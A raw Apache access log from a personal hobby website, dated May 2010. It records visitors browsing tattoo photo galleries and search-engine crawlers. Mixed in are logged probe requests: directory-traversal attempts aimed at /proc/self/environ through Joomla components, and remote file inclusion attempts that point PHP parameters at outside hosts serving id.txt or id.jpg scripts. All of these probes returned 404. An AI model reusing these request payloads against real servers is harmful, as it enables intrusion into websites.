98.145.93.201 - - [06/May/2010:12:34:13 -0500] "GET /tattoo/tatb7.JPG HTTP/1.1" 200 16193 "http://tomdolan.pconline.com/tattoo/set2.htm""Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; CPNTDF)"
98.145.93.201 - - [06/May/2010:12:34:13 -0500] "GET /tattoo/tatb8.JPG HTTP/1.1" 200 18467 "http://tomdolan.pconline.com/tattoo/set2.htm""Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; CPNTDF)"
98.145.93.201 - - [06/May/2010:12:34:13 -0500] "GET /tattoo/tatb9.JPG HTTP/1.1" 200 21598 "http://tomdolan.pconline.com/tattoo/set2.htm""Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; CPNTDF)"
98.145.93.201 - - [06/May/2010:12:34:13 -0500] "GET /tattoo/tatb1.JPG HTTP/1.1" 200 14848 "http://tomdolan.pconline.com/tattoo/set2.htm""Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; CPNTDF)"
98.145.93.201 - - [06/May/2010:12:34:13 -0500] "GET /tattoo/tatb6.JPG HTTP/1.1" 200 21190 "http://tomdolan.pconline.com/tattoo/set2.htm""Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; CPNTDF)"
98.145.93.201 - - [06/May/2010:12:34:34 -0500] "GET /tattoo/set3.htm HTTP/1.1" 200 1778 "http://tomdolan.pconline.com/tattoo/set2.htm""Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; CPNTDF)"
98.145.93.201 - - [06/May/2010:12:34:34 -0500] "GET /tattoo/tatc1.JPG HTTP/1.1" 200 21412 "http://tomdolan.pconline.com/tattoo/set3.htm""Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; CPNTDF)"
98.145.93.201 - - [06/May/2010:12:34:34 -0500] "GET /tattoo/tatc9.JPG HTTP/1.1" 200 18139 "http://tomdolan.pconline.com/tattoo/set3.htm""Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; CPNTDF)"
98.145.93.201 - - [06/May/2010:12:34:34 -0500] "GET /tattoo/tatc6.JPG HTTP/1.1" 200 14549 "http://tomdolan.pconline.com/tattoo/set3.htm""Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; CPNTDF)"
98.145.93.201 - - [06/May/2010:12:34:34 -0500] "GET /tattoo/tatc4.JPG HTTP/1.1" 200 12619 "http://tomdolan.pconline.com/tattoo/set3.htm""Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; CPNTDF)"
98.145.93.201 - - [06/May/2010:12:34:34 -0500] "GET /tattoo/tatc7.JPG HTTP/1.1" 200 12347 "http://tomdolan.pconline.com/tattoo/set3.htm""Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; CPNTDF)"
98.145.93.201 - - [06/May/2010:12:34:34 -0500] "GET /tattoo/tatc10.JPG HTTP/1.1" 200 14157 "http://tomdolan.pconline.com/tattoo/set3.htm""Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; CPNTDF)"
98.145.93.201 - - [06/May/2010:12:34:34 -0500] "GET /tattoo/tatc2.JPG HTTP/1.1" 200 17893 "http://tomdolan.pconline.com/tattoo/set3.htm""Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; CPNTDF)"
98.145.93.201 - - [06/May/2010:12:34:34 -0500] "GET /tattoo/tatc8.JPG HTTP/1.1" 200 17057 "http://tomdolan.pconline.com/tattoo/set3.htm""Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; CPNTDF)"
98.145.93.201 - - [06/May/2010:12:34:34 -0500] "GET /tattoo/tatc3.JPG HTTP/1.1" 200 16313 "http://tomdolan.pconline.com/tattoo/set3.htm""Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; CPNTDF)"
98.145.93.201 - - [06/May/2010:12:34:37 -0500] "GET /tattoo/tatc5.JPG HTTP/1.1" 200 19436 "http://tomdolan.pconline.com/tattoo/set3.htm""Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; CPNTDF)"
98.145.93.201 - - [06/May/2010:12:34:56 -0500] "GET /tattoo/set4.htm HTTP/1.1" 200 1600 "http://tomdolan.pconline.com/tattoo/set3.htm""Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; CPNTDF)"
98.145.93.201 - - [06/May/2010:12:34:56 -0500] "GET /tattoo/tatd1.JPG HTTP/1.1" 200 14507 "http://tomdolan.pconline.com/tattoo/set4.htm""Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; CPNTDF)"
98.145.93.201 - - [06/May/2010:12:34:56 -0500] "GET /tattoo/tatd8.JPG HTTP/1.1" 200 13038 "http://tomdolan.pconline.com/tattoo/set4.htm""Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; CPNTDF)"
98.145.93.201 - - [06/May/2010:12:34:56 -0500] "GET /tattoo/msameric.JPG HTTP/1.1" 200 14283 "http://tomdolan.pconline.com/tattoo/set4.htm""Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; CPNTDF)"
98.145.93.201 - - [06/May/2010:12:34:56 -0500] "GET /tattoo/tatd9.JPG HTTP/1.1" 200 17368 "http://tomdolan.pconline.com/tattoo/set4.htm""Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; CPNTDF)"
98.145.93.201 - - [06/May/2010:12:34:56 -0500] "GET /tattoo/tatd6.JPG HTTP/1.1" 200 12059 "http://tomdolan.pconline.com/tattoo/set4.htm""Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; CPNTDF)"
98.145.93.201 - - [06/May/2010:12:34:56 -0500] "GET /tattoo/tatd4.JPG HTTP/1.1" 200 12068 "http://tomdolan.pconline.com/tattoo/set4.htm""Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; CPNTDF)"
98.145.93.201 - - [06/May/2010:12:34:56 -0500] "GET /tattoo/tatd2.JPG HTTP/1.1" 200 14891 "http://tomdolan.pconline.com/tattoo/set4.htm""Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; CPNTDF)"
98.145.93.201 - - [06/May/2010:12:34:56 -0500] "GET /tattoo/tatd3.JPG HTTP/1.1" 200 12386 "http://tomdolan.pconline.com/tattoo/set4.htm""Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; CPNTDF)"
98.145.93.201 - - [06/May/2010:12:34:56 -0500] "GET /tattoo/tatd10.JPG HTTP/1.1" 200 19089 "http://tomdolan.pconline.com/tattoo/set4.htm""Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; CPNTDF)"
98.145.93.201 - - [06/May/2010:12:34:56 -0500] "GET /tattoo/tatd7.JPG HTTP/1.1" 200 20479 "http://tomdolan.pconline.com/tattoo/set4.htm""Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; CPNTDF)"
98.145.93.201 - - [06/May/2010:12:35:15 -0500] "GET /tattoo/bonus.htm HTTP/1.1" 200 808 "http://tomdolan.pconline.com/tattoo/set4.htm""Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; CPNTDF)"
98.145.93.201 - - [06/May/2010:12:35:15 -0500] "GET /tattoo/tate4.JPG HTTP/1.1" 200 18555 "http://tomdolan.pconline.com/tattoo/bonus.htm""Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; CPNTDF)"
98.145.93.201 - - [06/May/2010:12:35:16 -0500] "GET /tattoo/tate2.JPG HTTP/1.1" 200 13891 "http://tomdolan.pconline.com/tattoo/bonus.htm""Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; CPNTDF)"
98.145.93.201 - - [06/May/2010:12:35:16 -0500] "GET /tattoo/tate3.JPG HTTP/1.1" 200 16409 "http://tomdolan.pconline.com/tattoo/bonus.htm""Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; CPNTDF)"
67.218.116.166 - - [06/May/2010:12:35:45 -0500] "GET /robots.txt HTTP/1.1" 404 294 "-""Mozilla/5.0 (Twiceler-0.9 http://www.cuil.com/twiceler/robot.html)"
87.250.255.243 - - [06/May/2010:12:39:38 -0500] "GET /artwork/dioramas.htm HTTP/1.1" 304 - "-""Yandex/1.01.001 (compatible; Win16; I)"
91.121.25.16 - - [06/May/2010:12:40:51 -0500] "GET /index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.803"
216.129.119.43 - - [06/May/2010:12:40:53 -0500] "GET /robots.txt HTTP/1.1" 404 294 "-""Mozilla/5.0 (Twiceler-0.9 http://www.cuil.com/twiceler/robot.html)"
212.227.66.249 - - [06/May/2010:12:41:28 -0500] "GET /logs/access_log.1228089600!rfihttp://lkas.interfree.it/id.jpg?? HTTP/1.1" 404 345 "-""libwww-perl/5.805"
212.227.66.249 - - [06/May/2010:12:41:28 -0500] "GET /!rfihttp://lkas.interfree.it/id.jpg?? HTTP/1.1" 404 319 "-""libwww-perl/5.805"
212.227.66.249 - - [06/May/2010:12:41:29 -0500] "GET /logs/!rfihttp://lkas.interfree.it/id.jpg?? HTTP/1.1" 404 324 "-""libwww-perl/5.805"
91.121.25.16 - - [06/May/2010:12:46:05 -0500] "GET /index.php?option=com_hsconfig&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.803"
216.129.119.41 - - [06/May/2010:12:46:44 -0500] "GET /robots.txt HTTP/1.1" 404 294 "-""Mozilla/5.0 (Twiceler-0.9 http://www.cuil.com/twiceler/robot.html)"
91.121.25.16 - - [06/May/2010:12:47:35 -0500] "GET /logs/access_log.1272067200/index.php?option=com_hsconfig&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320 "-""libwww-perl/5.803"
91.121.25.16 - - [06/May/2010:12:47:35 -0500] "GET /index.php?option=com_hsconfig&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.803"
91.121.25.16 - - [06/May/2010:12:47:36 -0500] "GET /logs/index.php?option=com_hsconfig&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.803"
87.250.255.243 - - [06/May/2010:12:49:48 -0500] "GET /logs/access_log.1271289600 HTTP/1.1" 304 - "-""Yandex/1.01.001 (compatible; Win16; I)"
217.16.18.219 - - [06/May/2010:12:49:59 -0500] "GET /logs/access_log.1212451200/index.php?option=module&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320 "-""libwww-perl/5.805"
217.16.18.219 - - [06/May/2010:12:50:00 -0500] "GET /index.php?option=module&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.805"
217.16.18.219 - - [06/May/2010:12:50:00 -0500] "GET /logs/index.php?option=module&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.805"
67.218.116.165 - - [06/May/2010:12:50:36 -0500] "GET /robots.txt HTTP/1.1" 404 294 "-""Mozilla/5.0 (Twiceler-0.9 http://www.cuil.com/twiceler/robot.html)"
82.22.207.181 - - [06/May/2010:12:53:46 -0500] "GET /logs/access_log.1270512000//language/lang_english/lang_activity.php?phpbb_root_path=http://www.yajiada88.com/hid/id.txt???? HTTP/1.1" 404 351 "-""libwww-perl/5.805"
82.22.207.181 - - [06/May/2010:12:53:46 -0500] "GET //language/lang_english/lang_activity.php?phpbb_root_path=http://www.yajiada88.com/hid/id.txt???? HTTP/1.1" 404 324 "-""libwww-perl/5.805"
82.22.207.181 - - [06/May/2010:12:53:47 -0500] "GET /logs//language/lang_english/lang_activity.php?phpbb_root_path=http://www.yajiada88.com/hid/id.txt???? HTTP/1.1" 404 329 "-""libwww-perl/5.805"
82.22.207.181 - - [06/May/2010:12:55:49 -0500] "GET //language/lang_english/lang_activity.php?phpbb_root_path=http://www.yajiada88.com/hid/id.txt???? HTTP/1.1" 404 324 "-""libwww-perl/5.805"
194.8.75.145 - - [06/May/2010:12:56:31 -0500] "GET /logs/access_log.1235779200 HTTP/1.0" 404 298 "http://tomdolan.pconline.com/logs/access_log.1235779200""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; Win64; x64; SV1; .NET CLR 2.0.50727)"
194.8.75.145 - - [06/May/2010:12:56:31 -0500] "GET / HTTP/1.0" 200 991 "http://tomdolan.pconline.com/""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; Win64; x64; SV1; .NET CLR 2.0.50727)"
216.129.119.42 - - [06/May/2010:12:56:33 -0500] "GET /robots.txt HTTP/1.1" 404 294 "-""Mozilla/5.0 (Twiceler-0.9 http://www.cuil.com/twiceler/robot.html)"
72.250.182.83 - - [06/May/2010:12:56:34 -0500] "GET /costume/index1.htm HTTP/1.1" 200 21829 "http://www.google.com/search?hl=en&client=firefox-a&rls=org.mozilla%3Aen-US%3Aofficial&q=1450-1500+Pope+and+bishops&aq=f&aqi=&aql=&oq=&gs_rfai=""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.1.2) Gecko/20090729 Firefox/3.5.2 (.NET CLR 3.5.30729)"
72.250.182.83 - - [06/May/2010:12:56:37 -0500] "GET /favicon.ico HTTP/1.1" 404 295 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.1.2) Gecko/20090729 Firefox/3.5.2 (.NET CLR 3.5.30729)"
72.250.182.83 - - [06/May/2010:12:56:37 -0500] "GET /costume/index1.htm HTTP/1.1" 206 20693 "http://www.google.com/search?hl=en&client=firefox-a&rls=org.mozilla%3Aen-US%3Aofficial&q=1450-1500+Pope+and+bishops&aq=f&aqi=&aql=&oq=&gs_rfai=""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.1.2) Gecko/20090729 Firefox/3.5.2 (.NET CLR 3.5.30729)"
72.250.182.83 - - [06/May/2010:12:56:40 -0500] "GET /favicon.ico HTTP/1.1" 404 295 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.1.2) Gecko/20090729 Firefox/3.5.2 (.NET CLR 3.5.30729)"
72.250.182.83 - - [06/May/2010:12:56:40 -0500] "GET /favicon.ico HTTP/1.1" 404 295 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.1.2) Gecko/20090729 Firefox/3.5.2 (.NET CLR 3.5.30729)"
67.195.112.180 - - [06/May/2010:12:58:10 -0500] "GET / HTTP/1.0" 200 991 "-""Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
216.129.119.44 - - [06/May/2010:13:00:11 -0500] "GET /robots.txt HTTP/1.1" 404 294 "-""Mozilla/5.0 (Twiceler-0.9 http://www.cuil.com/twiceler/robot.html)"
216.129.119.14 - - [06/May/2010:13:00:18 -0500] "GET /robots.txt HTTP/1.1" 404 294 "-""Mozilla/5.0 (Twiceler-0.9 http://www.cuil.com/twiceler/robot.html)"
87.250.255.243 - - [06/May/2010:13:00:38 -0500] "GET /logs/ HTTP/1.1" 200 4495 "-""Yandex/1.01.001 (compatible; Win16; I)"
67.218.116.164 - - [06/May/2010:13:03:00 -0500] "GET /robots.txt HTTP/1.1" 404 294 "-""Mozilla/5.0 (Twiceler-0.9 http://www.cuil.com/twiceler/robot.html)"
216.129.119.12 - - [06/May/2010:13:06:57 -0500] "GET /robots.txt HTTP/1.1" 404 294 "-""Mozilla/5.0 (Twiceler-0.9 http://www.cuil.com/twiceler/robot.html)"
67.218.116.131 - - [06/May/2010:13:07:02 -0500] "GET /robots.txt HTTP/1.1" 404 294 "-""Mozilla/5.0 (Twiceler-0.9 http://www.cuil.com/twiceler/robot.html)"
91.121.25.16 - - [06/May/2010:13:07:32 -0500] "GET /logs/access_log.1272067200/index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320 "-""libwww-perl/5.803"
91.121.25.16 - - [06/May/2010:13:07:33 -0500] "GET /index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.803"
91.121.25.16 - - [06/May/2010:13:07:33 -0500] "GET /logs/index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.803"
67.218.116.162 - - [06/May/2010:13:07:34 -0500] "GET /robots.txt HTTP/1.1" 404 294 "-""Mozilla/5.0 (Twiceler-0.9 http://www.cuil.com/twiceler/robot.html)"
88.191.94.188 - - [06/May/2010:13:08:29 -0500] "GET /logs//blocks/block_site_map.php?root_folder_path=http://womancamp.co.kr/img/zero1.jpg??? HTTP/1.1" 404 315 "-""Mozilla/5.0"
88.191.94.188 - - [06/May/2010:13:08:29 -0500] "GET /logs/access_log.1266192000//blocks/block_site_map.php?root_folder_path=http://womancamp.co.kr/img/zero1.jpg??? HTTP/1.1" 404 337 "-""Mozilla/5.0"
88.191.94.188 - - [06/May/2010:13:08:29 -0500] "GET //blocks/block_site_map.php?root_folder_path=http://womancamp.co.kr/img/zero1.jpg??? HTTP/1.1" 404 310 "-""Mozilla/5.0"
88.191.94.188 - - [06/May/2010:13:08:29 -0500] "GET /logs/access_log.1262390400//blocks/block_site_map.php?root_folder_path=http://womancamp.co.kr/img/zero1.jpg??? HTTP/1.1" 404 337 "-""Mozilla/5.0"
88.191.94.188 - - [06/May/2010:13:08:30 -0500] "GET //blocks/block_site_map.php?root_folder_path=http://womancamp.co.kr/img/zero1.jpg??? HTTP/1.1" 404 310 "-""Mozilla/5.0"
88.191.94.188 - - [06/May/2010:13:08:30 -0500] "GET /logs//blocks/block_site_map.php?root_folder_path=http://womancamp.co.kr/img/zero1.jpg??? HTTP/1.1" 404 315 "-""Mozilla/5.0"
88.191.94.188 - - [06/May/2010:13:08:30 -0500] "GET /logs/access_log.1262390400//blocks/block_site_map.php?root_folder_path=http://womancamp.co.kr/img/zero1.jpg??? HTTP/1.1" 404 337 "-""Mozilla/5.0"
88.191.94.188 - - [06/May/2010:13:08:30 -0500] "GET /logs/access_log.1266192000//blocks/block_site_map.php?root_folder_path=http://womancamp.co.kr/img/zero1.jpg??? HTTP/1.1" 404 337 "-""Mozilla/5.0"
205.234.252.102 - - [06/May/2010:13:09:16 -0500] "GET /logs//bbs//skin/daerew_45galleryGD/setup.php?dir=http://jjang.oxwiz.co.kr/zboard//board/zero_vote/.cok/id.txt%0D?? HTTP/1.1" 404 328 "-""libwww-perl/5.810"
205.234.252.102 - - [06/May/2010:13:09:16 -0500] "GET //bbs//skin/daerew_45galleryGD/setup.php?dir=http://jjang.oxwiz.co.kr/zboard//board/zero_vote/.cok/id.txt%0D?? HTTP/1.1" 404 323 "-""libwww-perl/5.810"
87.250.255.243 - - [06/May/2010:13:10:13 -0500] "GET /logs/access_log.1270684800 HTTP/1.1" 304 - "-""Yandex/1.01.001 (compatible; Win16; I)"
216.129.119.13 - - [06/May/2010:13:10:50 -0500] "GET /robots.txt HTTP/1.1" 404 294 "-""Mozilla/5.0 (Twiceler-0.9 http://www.cuil.com/twiceler/robot.html)"
87.250.255.243 - - [06/May/2010:13:16:33 -0500] "GET /logs/access_log.1271116800 HTTP/1.1" 304 - "-""Yandex/1.01.001 (compatible; Win16; I)"
216.129.119.10 - - [06/May/2010:13:18:25 -0500] "GET /robots.txt HTTP/1.1" 404 294 "-""Mozilla/5.0 (Twiceler-0.9 http://www.cuil.com/twiceler/robot.html)"
188.123.242.164 - - [06/May/2010:13:19:55 -0500] "GET /tattoo/tattoo1.htm HTTP/1.1" 200 4192 "http://www.lotsasites.com/topic?topic=tattoos""Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.9.3a4) Gecko/20100407 MozillaDeveloperPreview/3.7a4"
188.123.242.164 - - [06/May/2010:13:19:55 -0500] "GET /tattoo/tat_1st.JPG HTTP/1.1" 200 16480 "http://tomdolan.pconline.com/tattoo/tattoo1.htm""Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.9.3a4) Gecko/20100407 MozillaDeveloperPreview/3.7a4"
188.123.242.164 - - [06/May/2010:13:19:59 -0500] "GET /tattoo/set1.htm HTTP/1.1" 200 2362 "http://tomdolan.pconline.com/tattoo/tattoo1.htm""Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.9.3a4) Gecko/20100407 MozillaDeveloperPreview/3.7a4"
188.123.242.164 - - [06/May/2010:13:20:00 -0500] "GET /tattoo/tat1.JPG HTTP/1.1" 200 16158 "http://tomdolan.pconline.com/tattoo/set1.htm""Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.9.3a4) Gecko/20100407 MozillaDeveloperPreview/3.7a4"
188.123.242.164 - - [06/May/2010:13:20:00 -0500] "GET /tattoo/tat10.JPG HTTP/1.1" 200 22746 "http://tomdolan.pconline.com/tattoo/set1.htm""Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.9.3a4) Gecko/20100407 MozillaDeveloperPreview/3.7a4"
188.123.242.164 - - [06/May/2010:13:20:00 -0500] "GET /tattoo/tat2.JPG HTTP/1.1" 200 18943 "http://tomdolan.pconline.com/tattoo/set1.htm""Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.9.3a4) Gecko/20100407 MozillaDeveloperPreview/3.7a4"
188.123.242.164 - - [06/May/2010:13:20:00 -0500] "GET /tattoo/tat4.JPG HTTP/1.1" 200 18080 "http://tomdolan.pconline.com/tattoo/set1.htm""Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.9.3a4) Gecko/20100407 MozillaDeveloperPreview/3.7a4"
188.123.242.164 - - [06/May/2010:13:20:00 -0500] "GET /tattoo/tat5.JPG HTTP/1.1" 200 13769 "http://tomdolan.pconline.com/tattoo/set1.htm""Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.9.3a4) Gecko/20100407 MozillaDeveloperPreview/3.7a4"
188.123.242.164 - - [06/May/2010:13:20:00 -0500] "GET /tattoo/tat3.jpg HTTP/1.1" 200 11901 "http://tomdolan.pconline.com/tattoo/set1.htm""Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.9.3a4) Gecko/20100407 MozillaDeveloperPreview/3.7a4"
188.123.242.164 - - [06/May/2010:13:20:00 -0500] "GET /tattoo/tat6.JPG HTTP/1.1" 200 18543 "http://tomdolan.pconline.com/tattoo/set1.htm""Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.9.3a4) Gecko/20100407 MozillaDeveloperPreview/3.7a4"
188.123.242.164 - - [06/May/2010:13:20:01 -0500] "GET /tattoo/tat7.JPG HTTP/1.1" 200 17358 "http://tomdolan.pconline.com/tattoo/set1.htm""Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.9.3a4) Gecko/20100407 MozillaDeveloperPreview/3.7a4"
188.123.242.164 - - [06/May/2010:13:20:01 -0500] "GET /tattoo/tat8.jpg HTTP/1.1" 200 13191 "http://tomdolan.pconline.com/tattoo/set1.htm""Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.9.3a4) Gecko/20100407 MozillaDeveloperPreview/3.7a4"
188.123.242.164 - - [06/May/2010:13:20:01 -0500] "GET /tattoo/tat9.JPG HTTP/1.1" 200 16749 "http://tomdolan.pconline.com/tattoo/set1.htm""Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.9.3a4) Gecko/20100407 MozillaDeveloperPreview/3.7a4"
188.123.242.164 - - [06/May/2010:13:20:10 -0500] "GET /tattoo/set2.htm HTTP/1.1" 200 1953 "http://tomdolan.pconline.com/tattoo/set1.htm""Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.9.3a4) Gecko/20100407 MozillaDeveloperPreview/3.7a4"
188.123.242.164 - - [06/May/2010:13:20:11 -0500] "GET /tattoo/tatb1.JPG HTTP/1.1" 200 14848 "http://tomdolan.pconline.com/tattoo/set2.htm""Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.9.3a4) Gecko/20100407 MozillaDeveloperPreview/3.7a4"
188.123.242.164 - - [06/May/2010:13:20:11 -0500] "GET /tattoo/tatb10.JPG HTTP/1.1" 200 17887 "http://tomdolan.pconline.com/tattoo/set2.htm""Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.9.3a4) Gecko/20100407 MozillaDeveloperPreview/3.7a4"
188.123.242.164 - - [06/May/2010:13:20:11 -0500] "GET /tattoo/tatb2.JPG HTTP/1.1" 200 16592 "http://tomdolan.pconline.com/tattoo/set2.htm""Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.9.3a4) Gecko/20100407 MozillaDeveloperPreview/3.7a4"
188.123.242.164 - - [06/May/2010:13:20:11 -0500] "GET /tattoo/tatb3.JPG HTTP/1.1" 200 16163 "http://tomdolan.pconline.com/tattoo/set2.htm""Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.9.3a4) Gecko/20100407 MozillaDeveloperPreview/3.7a4"
